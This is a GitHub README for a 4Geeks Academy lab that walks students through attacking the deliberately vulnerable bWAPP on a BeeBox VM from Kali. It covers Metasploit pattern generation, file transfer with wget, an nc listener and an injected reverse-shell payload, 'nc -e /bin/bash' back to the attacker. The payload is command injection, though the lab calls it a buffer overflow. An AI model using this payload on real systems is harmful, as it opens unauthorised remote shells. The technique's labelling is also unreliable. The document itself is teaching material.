Skip to content

Xafiq/buffer-overflow-exploit

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
assets
assets
 
 
commit
commit
 
 
README.es.md
README.es.md
 
 
README.md
README.md
 
 
learn.json
learn.json
 
 

Repository files navigation

Buffer overflow exploit

By @rosinni and other contributors at 4Geeks Academy

build by developers build by developers

These instructions are available in english

🌱 How to Start This Project?

This exercise aims to learn how to identify and exploit buffer overflow vulnerabilities. Through this project, you will understand how buffer overflows can be used to execute arbitrary code, as well as apply exploitation techniques to compromise the security of the application.

Requirements

  • Kali Machine (attacker)
  • BeeBox Machine

📝 Instructions

  1. Verify that both Kali Linux and BeeBox are connected to the same network. You can do this by checking the IP addresses assigned to each machine and ensuring they can communicate with each other.

  2. Check connectivity. From Kali, try pinging BeeBox and vice versa to confirm that the network connection is working.

    ping [IP-OF-BEEBOX]
ping [IP-OF-KALI]

  3. Log in to the BeeBox machine.

  4. Find the hash related to the vulnerability (this could be part of the configuration or code).

Verify Buffer Overflow Vulnerability

  1. Enter a movie name that is in the bWAPP database (e.g., Hulk, Iron Man).

  2. Then enter a movie name that is not in the database (e.g., Harry Potter).

  3. Run the following command to view the contents of the bof_1.php file:

    cat /var/www/bWAPP/bof_1.php

    The goal is to understand how the movie title input is handled and how it is passed as a command-line argument to the application. Look for signs of buffer overflow.

Generate and Use the Exploit String

  1. Generate the exploit string by running the following command on Kali to create a string that will help identify the buffer overflow:

    /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 360

  2. Save the generated string in a file named pattern_chain.txt:

    echo "Aa0Aa1Aa2Aa3Aa4Aa5..." > pattern_chain.txt

  3. Start an HTTP server on Kali to transfer the file:

    python3 -m http.server 8080

  4. Download the pattern_chain.txt file on BeeBox using wget:

    wget http://[IP-OF-KALI]:8080/pattern_chain.txt

  5. Read the content of the downloaded file on BeeBox:

    cat pattern_chain.txt

Inject the Exploit String and Payload

  1. Use the string generated with pattern_create.rb in the field or parameter that may cause the buffer overflow in bWAPP.

image 1

The goal is to see how the application responds to input that exceeds the expected size.

  1. Run a listener on Kali to receive the remote shell:

    nc -lvnp 4444

  2. To obtain a remote shell, inject the following payload into the field that causes the overflow:

    $(nc -e /bin/bash [IP-OF-KALI] 4444)

Replace [IP-OF-KALI] with the IP address of your Kali machine.

  1. Confirm the connection on Kali. If the exploit is successful, you should see a connection in the Kali listener and receive a Bash prompt.

Check Server Logs

  1. Review the web server logs on BeeBox for any messages related to the buffer overflow:

    sudo cat /var/log/apache2/error.log

image 1

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published